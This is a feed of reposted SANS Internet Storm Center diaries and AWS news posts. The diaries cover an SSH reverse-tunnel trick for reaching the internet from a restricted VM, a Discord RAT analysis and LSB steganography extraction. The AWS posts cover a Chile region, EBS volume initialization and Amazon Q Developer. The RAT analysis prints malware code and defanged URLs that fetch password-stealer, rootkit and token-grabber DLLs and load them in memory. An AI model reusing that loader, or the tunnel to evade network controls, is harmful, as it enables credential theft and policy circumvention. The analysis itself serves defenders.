No Internet Access? SSH to the Rescue!, (Thu, May 8th)

This post was originally published on this site

This quick diary is a perfect example of why I love Linux (or UNIX in general) operating system. There is always a way to "escape" settings imposed by an admin…

Disclaimer: This has been used for testing purpose in the scope of a security assessment project. Don't break your organization security policies!

To perform some assessments on a remote network, a Customer provided me a VM running Ubuntu and reachable through SSH (with IP filtering, only SSH key authentication, etc). Once logged on the system, I started to work but I was lacking of some tools and decided to install them. Bad news… The VM had no Internet access. No problem, we have an SSH access!

Let's assume the following enrivonment:

  • server.acme.org is the VM. SSH listening on port 65022.
  • client.sans.edu is my workstation with SSH listening on port 22.

Step 1: From client.sans.edu, connect to the server via one terminal and create a reverse tunnel ("-R" option)

ssh -p 65022 -i .ssh/privatekey -R 2222:localhost:22 xavier@server.acme.org

Step 2: Start a second session to the server, from a second terminal

ssh -p 65022 -i .ssh/privatekey xavier@server.acme.org

Step 3: From the second session, connect back to the client and setup a dynamic port forwaring ("-D")

ssh -p 2222 -D 1080 xavier@localhost

Step 4: From the fist session, create environment variables:

export http_proxy=socks5h://127.0.0.1:1080
export https_proxy=socks5h://127.0.0.1:1080
curl https://ipinfo.io/

Curl should tell you that your IP address is the one of client.sans.edu!

Now, all tools handling these variables will have access to the Interneet through your client! Slow but effective!

They are for sure many other ways to achieve this but… that's the magic of UNIX, always plenty of way to solve issues… Please share your idea or techiques!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In the works – AWS South America (Chile) Region

This post was originally published on this site

Today, Amazon Web Services (AWS) announced plans to launch a new AWS Region in Chile by the end of 2026. The AWS South America (Chile) Region will consist of three Availability Zones at launch, bringing AWS infrastructure and services closer to customers in Chile. This new Region joins the AWS South America (São Paulo) and AWS Mexico (Central) Regions as our third AWS Region in Latin America. Each Availability Zone is separated by a meaningful distance to support applications that need low latency while significantly reducing the risk of a single event impacting availability.

Skyline of Santiago de Chile with modern office buildings in the financial district in Las Condes

The new AWS Region will bring advanced cloud technologies, including artificial intelligence (AI) and machine learning (ML), closer to customers in Latin America. Through high-bandwidth, low-latency network connections over dedicated, fully redundant fiber, the Region will support applications requiring synchronous replication while giving you the flexibility to run workloads and store data locally to meet data residency requirements.

AWS in Chile
In 2017, AWS established an office in Santiago de Chile to support local customers and partners. Today, there are business development teams, solutions architects, partner managers, professional services consultants, support staff, and personnel in various other roles working in the Santiago office.

As part of our ongoing commitment to Chile, AWS has invested in several infrastructure offerings throughout the country. In 2019, AWS launched an Amazon CloudFront edge location in Chile. This provides a highly secure and programmable content delivery network that accelerates the delivery of data, videos, applications, and APIs to users worldwide with low latency and high transfer speeds.

AWS strengthened its presence in 2021 with two significant additions. First, an AWS Ground Station antenna location in Punta Arenas, offering a fully managed service for satellite communications, data processing, and global satellite operations scaling. Second, AWS Outposts in Chile, bringing fully managed AWS infrastructure and services to virtually any on-premises or edge location for a consistent hybrid experience.

In 2023, AWS further enhanced its infrastructure with two key developments, an AWS Direct Connect location in Chile that lets you create private connectivity between AWS and your data center, office, or colocation environment, and AWS Local Zones in Santiago, placing compute, storage, database, and other select services closer to large population centers and IT hubs. The AWS Local Zone in Santiago helps customers deliver applications requiring single-digit millisecond latency to end users.

The upcoming AWS South America (Chile) Region represents our continued commitment to fueling innovation in Chile. Beyond building infrastructure, AWS plays a crucial role in developing Chile’s digital workforce through comprehensive cloud education initiatives. Through AWS Academy, AWS Educate, and AWS Skill Builder, AWS provides essential cloud computing skills to diverse groups—from students and developers to business professionals and emerging IT leaders. Since 2017, AWS has trained more than two million people across Latin America on cloud skills, including more than 100,000 in Chile.

AWS customers in Chile
AWS customers in Chile have been increasingly moving their applications to AWS and running their technology infrastructure in AWS Regions around the world. With the addition of this new AWS Region, customers will be able to provide even lower latency to end users and use advanced technologies such as generative AI, Internet of Things (IoT), mobile services, banking industry, and more, to drive innovation. This Region will give AWS customers the ability to run their workloads and store their content in Chile.

Here are some examples of customers in Chile using AWS to drive innovation:

The Digital Government Secretariat (SGD) is the Chilean government institution responsible for proposing and coordinating the implementation of the Digital Government Strategy, providing an integrated government approach. SGD coordinates, advises, and provides cross-sector support in the strategic use of digital technologies, data, and public information to improve state administration and service delivery. To fulfill this mission, SGD relies on AWS to operate critical digital platforms including Clave Única (single sign-on), FirmaGob (digital signature), the State Electronic Services Integration Platform (PISEE), DocDigital, SIMPLE, and the Administrative Procedures and Services Catalog (CPAT), among others.

Transbank, Chile’s largest payment solutions ecosystem managing the largest percentage of national transactions, used AWS to significantly reduce time-to-market for new products. Moreover, Transbank implemented multiple AWS-powered solutions, enhancing team productivity and accelerating innovation. These initiatives showcase how financial technology companies can use AWS to drive innovation and operational efficiency. “The new AWS Region in Chile will be very important for us,” said Jorge Rodríguez M., Chief Architecture and Technology Officer (CA&TO) of Transbank. “It will further reduce latency, improve security and expand the possibilities for innovation, allowing us to serve our customers with new and better services and products.”

To learn more about AWS customers in Chile, visit AWS Customer Success Stories.

AWS sustainability efforts in Chile
AWS is committed to water stewardship in Chile through innovative conservation projects. In the Maipo Basin, which provides essential water for the Metropolitan Santiago and Valparaiso regions, AWS has partnered with local farmers and climate-tech company Kilimo to implement water-saving initiatives. The project involves converting 67 hectares of agricultural land from flood to drip irrigation, which will save approximately 200 million liters of water annually.

This water conservation effort supports AWS commitment to be water positive by 2030 and demonstrates our dedication to environmental sustainability in the communities where AWS operate. The project uses efficient drip irrigation systems that deliver water directly to plant root systems through a specialized pipe network, maximizing water efficiency for agricultural use. To learn more about this initiative, read our blog post AWS expands its water replenishment program to China and Chile—and adds projects in the US and Brazil.

AWS community in Chile
The AWS community in Chile is one of the most active in the region, comprising of AWS Community Builders, two AWS User Groups (AWS User Group Chile and AWS Girls Chile), and an AWS Cloud Club. These groups hold monthly events and have organized two AWS Community Days. At the first Community Day, held in 2023, we had the honor of having Jeff Barr as the keynote speaker.

Chile AWS Community Day 2023

Stay tuned
We’ll announce the opening of this and the other Regions in future blog posts, so be sure to stay tuned! To learn more, visit the AWS Region in Chile page.

Eli

Thanks to Leonardo Vilacha for the Chile AWS Community Day 2023 photo.


How is the News Blog doing? Take this 1 minute survey!

(This survey is hosted by an external company. AWS handles your information as described in the AWS Privacy Notice. AWS will own the data gathered via this survey and will not share the information collected with survey respondents.)

Example of "Modular" Malware, (Wed, May 7th)

This post was originally published on this site

Developers (of malware as well as goodware) don't have to reinvent the wheel all the time. Why rewrite a piece of code that was development by someone else? In the same way, all operating systems provide API calls (or system calls) to interact with the hardware (open a file, display a pixel, send a packet over the wire, etc). These system calls are grouped in libraries (example: Windows provided wininet.dll to interact with networks).

Briefly, Developers have different ways to use libraries:

  • Static linking: The library is added (appended) to the user code by thelinker at compilation time.
  • Dynamic loading: The library is loaded by the "loader" when the program is started and made available to the program (the well-known "DLL" files)
  • On-demand loading: The Developer decides that it's now time to load an extra DLL in the program environment.

In the malware ecosystem, the third method is pretty cool because Attackers can develop "modular" malware that will expand their capabilities only when needed. Let's imagine a malware that will first perform a footprint of the victim's computer. If the victim is an administrative employee and some SAP-related files or processes are discovered by the malware, it can fetch a specific DLL from a C2 server and load it to add features targeting SAP systems. Besides the fact that the malware is smaller, the malware may look less suspicious.

Here is an example of such malware that expands its capabilities on demand. The file is a Discord RAT (SHA256:9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e)[1]. The sample is a .Net malware and can be easily decompiled. Good news, there is no obfuscation implemented and the code is pretty easy to read.

The list of "modules" or external DLLs is provided in a dictionary:

public static Dictionary<string, string> dll_url_holder = new Dictionary<string, string>
{
  { "password", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll" },
  { "rootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll" },
  { "unrootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll" },
  { "webcam", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll" },
  { "token", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll" }
};

Let's take an example: Webcam.dll:

remnux@remnux:/MalwareZoo/20250507$ file Webcam.dll
Webcam.dll: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows

DLLs are loaded only when required by the malware. The RAT has a command "webcampic" to take a picture of the victim:

"--> !webcampic = Take a picture out of the selected webcam"

Let's review the function associated to this command:

public static async Task webcampic(string channelid)
{
    if (!dll_holder.ContainsKey("webcam"))
    {
        await LoadDll("webcam", await LinkToBytes(dll_url_holder["webcam"]));
    }
    if (!activator_holder.ContainsKey("webcam"))
    {
        activator_holder["webcam"] = Activator.CreateInstance(dll_holder["webcam"].GetType("Webcam.webcam"));
        activator_holder["webcam"].GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    }
    object obj = activator_holder["webcam"];
    obj.GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    if ((obj.GetType().GetField("cameras").GetValue(obj) as IDictionary<int, string>).Count < 1)
    {
        await Send_message(channelid, "No cameras found!");
        await Send_message(channelid, "Command executed!");
        return;
    }
    try
    {
        byte[] item = (byte[])obj.GetType().GetMethod("GetImage").Invoke(obj, new object[0]);
        await Send_attachment(channelid, "", new List<byte[]> { item }, new string[1] { "webcam.jpg" });
        await Send_message(channelid, "Command executed!");
    }
    catch
    {
        await Send_message(channelid, "Error taking picture!");
        await Send_message(channelid, "Command executed!");
    }
}

"dll_holder" is a dictionary that contains addresses of loaded DLLs:

public static async Task LoadDll(string name, byte[] data)
{
    dll_holder[name] = Assembly.Load(data);
}

In the webcam function, if the DLLS has not been loaded yet, the DLL file is fetched from the Git repository, converted into a byte array and loaded in memory. Once the DLL is loaded, the main class is used. Here is the decompiled code of Webcam.dll:

namespace Webcam
{
    public class webcam
    {
        public static Dictionary<string, bool> ready = new Dictionary<string, bool>();
        public static Dictionary<string, Bitmap> holder = new Dictionary<string, Bitmap>();
        public static Dictionary<int, string> cameras = new Dictionary<int, string>();
        public static int selected = 1;
        public static string GetWebcams()
        {
            // Code removed
        }
        public static byte[] GetImage()
        {
            // Code removed
        }
        private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs, string key)
        {
            // Code removed
        }
        public static bool select(int num)
        {
            // Code removed
        }
        public static void init()
        {
            GetWebcams();
        }
    }
}

This is simple example of a "modular" malware! Happy Hunting!

[1] https://www.virustotal.com/gui/file/9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Accelerate the transfer of data from an Amazon EBS snapshot to a new EBS volume

This post was originally published on this site

Today we are announcing the general availability of Amazon Elastic Block Store (Amazon EBS) Provisioned Rate for Volume Initialization, a feature that accelerates the transfer of data from an EBS snapshot, a highly durable backup of volumes stored in Amazon Simple Storage Service (Amazon S3) to a new EBS volume.

With Amazon EBS Provisioned Rate for Volume Initialization, you can create fully performant EBS volumes within a predictable amount of time. You can use this feature to speed up the initialization of hundreds of concurrent volumes and instances. You can also use this feature when you need to recover from an existing EBS Snapshot and need your EBS volume to be created and initialized as quickly as possible. You can use this feature to quickly create copies of EBS volumes with EBS Snapshots in a different Availability Zone, AWS Region, or AWS account. Provisioned Rate for Volume Initialization for each volume is charged based on the full snapshot size and the specified volume initialization rate.

This new feature expedites the volume initialization process by fetching the data from an EBS Snapshot to an EBS volume at a consistent rate that you specify between 100 MiB/s and 300 MiB/s. You can specify this volume initialization rate at which the snapshot blocks are to be downloaded from Amazon S3 to the volume.

With specifying the volume initialization rate, you can create a fully performant volume in a predictable time, enabling increased operational efficiency and visibility on the expected time of completion. If you run utilities like fio/dd to expedite volume initialization for your workflows like application recovery and volume copy for testing and development, it will remove the operational burden of managing such scripts with the consistency and predictability to your workflows.

Get started with specifying the volume initialization rate
To get started, you can choose the volume initialization rate when you launch your EC2 instance or create your volume from the snapshot.

1. Create a volume in the EC2 launch wizard
When launching new EC2 instances in the launch wizard of EC2 console, you can enter a desired Volume initialization rate in the Storage (volumes) section.

You can also set the volume initialization rate when creating and modifying the EC2 Launch Templates.

In the AWS Command Line Interface (AWS CLI), you can add VolumeInitializationRate parameter to the block device mappings when call run-instances command.

aws ec2 run-instances 
    --image-id ami-0abcdef1234567890 
    --instance-type t2.micro 
    --subnet-id subnet-08fc749671b2d077c 
    --security-group-ids sg-0b0384b66d7d692f9 
    --key-name MyKeyPair 
    --block-device-mappings file://mapping.json

Contents of mapping.json. This example adds /dev/sdh an empty EBS volume with a size of 8 GiB.

[
    {
        "DeviceName": "/dev/sdh",
        "Ebs": {
            "VolumeSize": 8
            "VolumeType": "gp3",            
            "VolumeInitializationRate": 300
		 } 
     } 
]

To learn more, visit block device mapping options, which defines the EBS volumes and instance store volumes to attach to the instance at launch.

2. Create a volume from snapshots
When you create a volume from snapshots, you can also choose Create volume in the EC2 console and specify the Volume initialization rate.

Confirm your new volume with the initialization rate.

In the AWS CLI, you can use VolumeInitializationRate parameter and when calling create-volume command.

aws ec2 create-volume --region us-east-1 --cli-input-json '{
    "AvailabilityZone": "us-east-1a",
    "VolumeType": "gp3",
    "SnapshotId": "snap-07f411eed12ef613a",
    "VolumeInitializationRate": 300
}'

If the command is run successfully, you will receive the result below.

{
    "AvailabilityZone": "us-east-1a",
    "CreateTime": "2025-01-03T21:44:53.000Z",
    "Encrypted": false,
    "Size": 100,
    "SnapshotId": "snap-07f411eed12ef613a",
    "State": "creating",
    "VolumeId": "vol-0ba4ed2a280fab5f9",
    "Iops": 300,
    "Tags": [],
    "VolumeType": "gp2",
    "MultiAttachEnabled": false,
    "VolumeInitializationRate": 300
}

You can also set the volume initialization rate when replacing root volumes of EC2 instances and provisioning EBS volumes using the EBS Container Storage Interface (CSI) driver.

After creation of the volume, EBS will keep track of the hydration progress and publish an Amazon EventBridge notification for EBS to your account when the hydration completes so that they can be certain when their volume is fully performant.

To learn more, visit Create an Amazon EBS volume and Initialize Amazon EBS volumes in the Amazon EBS User Guide.

Now available
Amazon EBS Provisioned Rate for Volume Initialization is now available and supported for all EBS volume types today. You will be charged based on the full snapshot size and the specified volume initialization rate. To learn more, visit Amazon EBS Pricing page.

To learn more about Amazon EBS including this feature, take the free digital course on the AWS Skill Builder portal. Course includes use cases, architecture diagrams and demos.

Give this feature a try in the Amazon EC2 console today and send feedback to AWS re:Post for Amazon EBS or through your usual AWS Support contacts.

— Channy


How is the News Blog doing? Take this 1 minute survey!

(This survey is hosted by an external company. AWS handles your information as described in the AWS Privacy Notice. AWS will own the data gathered via this survey and will not share the information collected with survey respondents.)

Amazon Q Developer in GitHub (in preview) accelerates code generation

This post was originally published on this site

Starting today, you can now use Amazon Q Developer in GitHub in preview! This is fantastic news for the millions of developers who use GitHub on a daily basis, whether at work or for personal projects. They can now use Amazon Q Developer for feature development, code reviews, and Java code migration directly within the GitHub interface.

To demonstrate, I’m going to use Amazon Q Developer to help me create an application from zero called StoryBook Teller. I want this to be an ASP.Core website using .NET 9 that takes three images from the user and uses Amazon Bedrock with Anthropic’s Claude to generate a story based on them.

Let me show you how this works.

Installation

The first thing you need to do is install the Amazon Q Developer application in GitHub, and you can begin using it immediately without connecting to an AWS account.

You’ll then be presented with a choice to add it to all your repositories or select specific ones. In this case, I want to add it to my storybook-teller-demo repo, so I choose Only selected repositories and type in the name to find it.

This is all you need to do to make the Amazon Q Developer app ready to use inside your selected repos. You can verify that the app is installed by navigating to your GitHub account Settings and the app should be listed in the Applications page.

You can choose Configure to view permissions and add Amazon Q Developer to repositories or remove it at any time.

Now let’s use Amazon Q Developer to help us build our application.

Feature development
When Amazon Q Developer is installed into a repository, you can assign GitHub issues to the Amazon Q development agent to develop features for you. It will then generate code using the whole codebase in your repository as context as well as the issue’s description. This is why it’s important to list your requirements as accurately and clearly as possible in your GitHub issues, the same way that you should always strive for anyway.

I have created five issues in my StoryBook Teller repository that cover all my requirements for this app, from creating a skeleton .NET 9 project to implementing frontend and backend.

Let’s use Amazon Q Developer to develop the application from scratch and help us implement all these features!

To begin with, I want Amazon Q Developer to help me create the .NET project. To do this, I open the first issue, and in the Labels section, I find and select Amazon Q development agent.

That’s all there is to it! The issue is now assigned to Amazon Q Developer. After the label is added, the Amazon Q development agent automatically starts working behind the scenes providing progress updates through the comments, starting with one saying, I'm working on it.

As you might expect, the amount of time it takes will depend on the complexity of the feature. When it’s done, it will automatically create a pull request with all the changes.

The next thing I want to do is make sure that the generated code works, so I’m going to download the code changes and run the app locally on my computer.

I go to my terminal and type git fetch origin pull/6/head:pr-6 to get the code for the pull request it created. I double-check the contents and I can see that I do indeed have an ASP.Core project generated using .NET 9, as I expected.

I then run dotnet run and open the app with the URL given in the output.

Brilliant, it works! Amazon Q Developer took care of implementing this one exactly as I wanted based on the requirements I provided in the GitHub issue. Now that I have tested that the app works, I want to review the code itself before I accept the changes.

Code review
I go back to GitHub and open the pull request. I immediately notice that Amazon Q Developer has performed some automatic checks on the generated code.

This is great! It has already done quite a bit of the work for me. However, I want to review it before I merge the pull request. To do that, I navigate to the Files changed tab.

I review the code, and I like what I see! However, looking at the contents of .gitignore, I notice something that I want to change. I can see that Amazon Q Developer made good assumptions and added exclusion rules for Visual Studio (VS) Code files. However, JetBrains Rider is my favorite integrated development environment (IDE) for .NET development, so I want to add rules for it, too.

You can ask Amazon Q Developer to reiterate and make changes by using the normal code review flow in the GitHub interface. In this case, I add a comment to the .gitignore code saying, add patterns to ignore Rider IDE files. I then choose Start a review, which will queue the change in the review.

I select Finish your review and Request changes.

Soon after I submit the review, I’m redirected to the Conversation tab. Amazon Q Developer starts working on it, resuming the same feedback loop and encouraging me to continue with the review process until I’m satisfied.

Every time Q Developer makes changes, it will run the automated checks on the generated code. In this case, the code was somewhat straightforward, so it was expected that the automatic code review wouldn’t raise any issues. But what happens if we have more complex code?

Let’s take another example and use Amazon Q Developer to implement the feature for enabling image uploads on the website. I use the same flow I described in the previous section. However, I notice that the automated checks on the pull request flagged a warning this time, stating that the API generated to support image uploads on the backend is missing authorization checks effectively allowing direct public access. It explains the security risk in detail and provides useful links.

It then automatically generates a suggested code fix.

When it’s done, you can review the code and choose to Commit changes if you’re happy with the changes.

After fixing this and testing it, I’m happy with the code for this issue and move on applying the same process to other ones. I assign the Amazon Q development agent to each one of my remaining issues, wait for it to generate the code, and go through the iterative review process asking it to fix any issues for me along the way. I then test my application at the end of that software cycle and am very pleased to see that Amazon Q Developer managed to handle all issues, from project setup, to boilerplate code, to more complex backend and frontend. A true full-stack developer!

I did notice some things that I wanted to change along the way. For example, it defaulted to using the Invoke API to send the uploaded images to Amazon Bedrock instead of the Converse API. However, because I didn’t state this in my requirements, it had no way of knowing. This highlights the importance of being as precise as possible in your issue’s titles and descriptions to give Q Developer the necessary context and make the development process as efficient as possible.

Having said that, it’s still straightforward to review the generated code on the pull requests, add comments, and let the Amazon Q Developer agent keep working on changes until you’re happy with the final result. Alternatively, you can accept the changes in the pull request and create separate issues that you can assign to Q Developer later when you’re ready to develop them.

Code transformation
You can also transform legacy Java codebases to modern versions with Q Developer. Currently, it can update applications from Java 8 or Java 11 to Java 17, with more options coming in future releases.

The process is very similar to the one I demonstrated earlier in this post, except for a few things.

First, you need to create an issue within a GitHub repository containing a Java 8 or Java 11 application. The title and description don’t really matter in this case. It might even be a short title such as “Migration,” leaving the description empty. Then, on Labels, you assign the Amazon Q transform agent label to the issue.

Much like before, Amazon Q Developer will start working immediately behind the scenes before generating the code on a pull request that you can review. This time, however, it’s the Amazon Q transform agent doing the work which is specialized in code migration and will take all the necessary steps to analyze and migrate the code from Java 8 to Java 17.

Notice that it also needs a workflow to be created, as per the documentation. If you don’t have it enabled yet, it will display clear instructions to help you get everything set up before trying again.

As expected, the amount of time needed to perform a migration depends on the size and complexity of your application.

Conclusion
Using Amazon Q Developer in GitHub is like having a full-stack developer that you can collaborate with to develop new features, accelerate the code review process, and rely on to enhance the security posture and quality of your code. You can also use it to automate migration from Java 8 and 11 applications to Java 17 making it much easier to get started on that migration project that you might have been postponing for a while. Best of all, you can do all this from the comfort of your own GitHub environment.

Now available
You can now start using Amazon Q Developer today for free in GitHub, no AWS account setup needed.

Amazon Q Developer in GitHub is currently in preview.

Matheus Guimaraes | codingmatheus


How is the News Blog doing? Take this 1 minute survey!

(This survey is hosted by an external company. AWS handles your information as described in the AWS Privacy Notice. AWS will own the data gathered via this survey and will not share the information collected with survey respondents.)

Amazon Q Developer elevates the IDE experience with new agentic coding experience

This post was originally published on this site

Today, Amazon Q Developer introduces a new, interactive, agentic coding experience that is now available in the integrated development environments (IDE) for Visual Studio Code. This experience brings interactive coding capabilities, building upon existing prompt-based features. You now have a natural, real-time collaborative partner working alongside you while writing code, creating documentation, running tests, and reviewing changes.

Amazon Q Developer transforms how you write and maintain code by providing transparent reasoning for its suggestions and giving you the choice between automated modifications or step-by-step confirmation of changes. As a daily user of Amazon Q Developer command line interface (CLI) agent, I’ve experienced firsthand how Amazon Q Developer chat interface makes software development a more efficient and intuitive process. Having an AI-powered assistant only a q chat away in CLI has streamlined my daily development workflow, enhancing the coding process.

The new agentic coding experience in Amazon Q Developer in the IDE seamlessly interacts with your local development environment. You can read and write files directly, execute bash commands, and engage in natural conversations about your code. Amazon Q Developer comprehends your codebase context and helps complete complex tasks through natural dialog, maintaining your workflow momentum while increasing development speed.

Let’s see it in action
To begin using Amazon Q Developer for the first time, follow the steps in the Getting Started with Amazon Q Developer guide to access Amazon Q Developer. When using Amazon Q Developer, you can choose between Amazon Q Developer Pro, a paid subscription service, or Amazon Q Developer Free tier with AWS Builder ID user authentication.

For existing users, update to the new version. Refer to Using Amazon Q Developer in the IDE for activation instructions.

To start, I select the Amazon Q icon in my IDE to open the chat interface. For this demonstration, I’ll create a web application that transforms Jupiter notebooks from the Amazon Nova sample repository into interactive applications.

I send the following prompt: In a new folder, create a web application for video and image generation that uses the notebooks from multimodal-generation/workshop-sample as examples to create the applications. Adapt the code in the notebooks to interact with models. Use existing model IDs

Amazon Q Developer then examines the files: the README file, notebooks, notes, and everything that is in the folder where the conversation is positioned. In our case it’s at the root of the repository.

After completing the repository analysis, Amazon Q Developer initiates the application creation process. Following the prompt requirements, it requests permission to execute the bash command for creating necessary folders and files.

With the folder structure in place, Amazon Q Developer proceeds to build the complete web application.

In a few minutes, the application is complete. Amazon Q Developer provides the application structure and deployment instructions, which can be converted into a README file upon request in the chat.

During my initial attempt to run the application, I encountered an error. I described it in Spanish using Amazon Q chat.

Amazon Q Developer responded in Spanish and gave me the solutions and code modifications in Spanish! I loved it!

After implementing the suggested fixes, the application ran successfully. Now I can create, modify, and analyze images and videos using Amazon Nova through this newly created interface.

The preceding images showcase my application’s output capabilities. Because I asked to modify the video generation code in Spanish, it gave me the message in Spanish.

Things to know
Chatting in natural languages – Amazon Q Developer IDE supports many languages, including English, Mandarin, French, German, Italian, Japanese, Spanish, Korean, Hindi, and Portuguese. For detailed information, visit the Amazon Q Developer User Guide page.

Collaboration and understanding – The system examines your repository structure, files, and documentation while giving you the flexibility to interact seamlessly through natural dialog with your local development environment. This deep comprehension allows for more accurate and contextual assistance during development tasks.

Control and transparency – Amazon Q Developer provides continuous status updates as it works through tasks and lets you choose between automated code modifications or step-by-step review, giving you complete control over the development process.

Availability – Amazon Q Developer interactive, agentic coding experience is now available in the IDE for Visual Studio Code.

Pricing – Amazon Q Developer agentic chat is available in the IDE at no additional cost to both Amazon Q Developer Pro Tier and Amazon Q Developer Free tier users. For detailed pricing information, visit the Amazon Q Developer pricing page.

To learn more about getting started visit the Amazon Q Developer product web page.

— Eli


How is the News Blog doing? Take this 1 minute survey!

(This survey is hosted by an external company. AWS handles your information as described in the AWS Privacy Notice. AWS will own the data gathered via this survey and will not share the information collected with survey respondents.)

Steganography Analysis With pngdump.py: Bitstreams, (Thu, May 1st)

This post was originally published on this site

A friend asked me if my pngdump.py tool can extract individual bits from an image (cfr. diary entry "Steganography Analysis With pngdump.py").

It can not. But another tool can: format-bytes.py.

In the diary entry I mentioned, a PE file is embedded inside a PNG file according to a steganographic method: all the bytes of a channel are replaced by the bytes that make up the PE file. If one would visualize this image, it would be clear that it represents nothing. That it just looks like noise.

Often with steganography, the purpose is to hide a message in some medium, without distorting that medium too much. If it's a picture for example, then one would not notice a difference between the original picture and the altered picture upon visual inspection.

This is often achieved by making small changes to the colors that define individual pixels. Take an 8-bit RGB encoding: each pixel is represented by 3 bytes, one for the intensity of the color red, one for green and one for blue. By changing just the least significant bit (LSB) of each byte that represents the RGB color of the pixel, one can encode 3 bits, without noticable change in the final color (it's a change smaller than 0.5% (1/256)).

Take these pictures for example:

The one on the left is the original picture, the one on the right has an embedded PE file (via LSB steganography). I can't see a difference.

To extract the PE file from the picture on the right, one has to extract the LSB of each color byte, and assemble them into bytes. This can be done with format-bytes.py.

format-bytes.py takes binary data as input and parses it per the instructions of the analyst. I typically use it to parse bytes, like in this example:

format-bytes.py -f "<IBB"

This means the input data should be parsed as a unsigned 32-bit integer (I), little-endian (<), followed by two unsigned bytes (BB).

But format-bytes.py can also extract individual bits: this is done with bitstream processing. Let me show you an example.

The steganographic lake image I created contains an embedded PE file. The bits that make up the bytes of the PE file, are stored in the least significant bit of each color byte of the pixels in the image.

First I encoded the length of the PE file as an unsigned, little-endian 32-bit integer. Using the LSBs of the pixels. And then followed by the PE file itself, also encoded in the LSBs of the pixels.

The following command decodes the length:

pngdump.py -R -d lake-exe.png   | cut-bytes.py 0:32l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"   | format-bytes.py

pngdump.py's option -R extracts the raw bitmap of the image, option -d does a binary dump.

This bitmap data is piped into cut-bytes.py to select the first 32 bytes (0:32l). We want the first 32 bytes to extract the 32 LSBs that make up the length of the embedded PE file.

format-bytes.py's option -f "bitstream=f:B,b:0,j:>" instructs the tool to operate on the bit level (bitstream) and to treat the incoming data as individual unsigned bytes (f:B, e.g., format B), to select the least significant bit (b:0, e.g., the bit at position 0 in the byte) and to assemble the extracted bits into bytes in big-endian order (j:>, e.g., join in big-endian order).

That produces 4 bytes, that can then be piped again into another instance of format-bytes, this time to parse the integer.

This output produced by the second instance of format-bytes.py, represents the incoming data in different formats. The line that starts with 4I shows the formatting of 4-byte long integers. ul stand for unsigned & little-endian. Thus the length of the PE file is 58120, this is stored in the LSBs of the first 32 bytes of the raw image.

Now that we know the length of the PE files, we know how many bits to extract: 58120 * 8 = 464960. So from the 32nd byte in the raw image, we take 464960 bytes and process them with the same bitstream method (but this time, I do an HEX/ASCII dump (-a) to view the extracted PE file):

pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -a -f "bitstream=f:B,b:0,j:>" | headtail.py

This looks indeed as a PE file. Let's do a binary dump and pipe it into tools file-magic.py and pecheck.py to verify that it is indeed a valid PE file:

pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | file-magic.py

pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | pecheck.py | headtail.py

We did extract a valid PE file.

And as a final check, since I know the hash of the original file, let's validate it with hash.py:

pngdump.py -R -d lake-exe.png | cut-bytes.py 32:464960l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | hash.py -v 0a391054e50a4808553466263c9c3b63e895be02c957dbb957da3ba96670cf34

As Johannes explained in his Stormcast episode, there are many ways to encode data using steganography, and it's often hard to detect/extract unless you know the exact algorithm. I was able to decode it with my tools, because I knew exactly how the PE file was encoded (as I did it myself 🙂 ).

You can find many (online) steganography tools, but they don't always explain how they encode a payload.

If you are interested, tune in this Saturday, I will present you with a challenge diary entry. 🙂

 

Didier Stevens
Senior handler
blog.DidierStevens.com

 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.